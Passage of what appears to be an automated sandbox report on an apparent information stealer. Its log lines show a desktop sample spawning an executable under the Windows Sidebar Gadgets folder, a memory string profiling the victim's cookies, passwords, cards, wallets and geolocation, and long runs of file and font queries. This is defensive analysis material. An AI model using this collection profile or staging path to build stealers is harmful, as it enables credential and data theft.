                          Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002FE2000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"206","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Domains (e9db)":"","Passwords Domains (e9db)":""},"5.0.4",5,1,"","user","358075","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\windows sidebar\\Gadgets","2DMTP (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]
                          Source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: sidebar\\Gadgets","2DMTP (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]P_
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Queries volume information: C:\Users\user\Desktop\zZ1Y43bxxV.exe VolumeInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
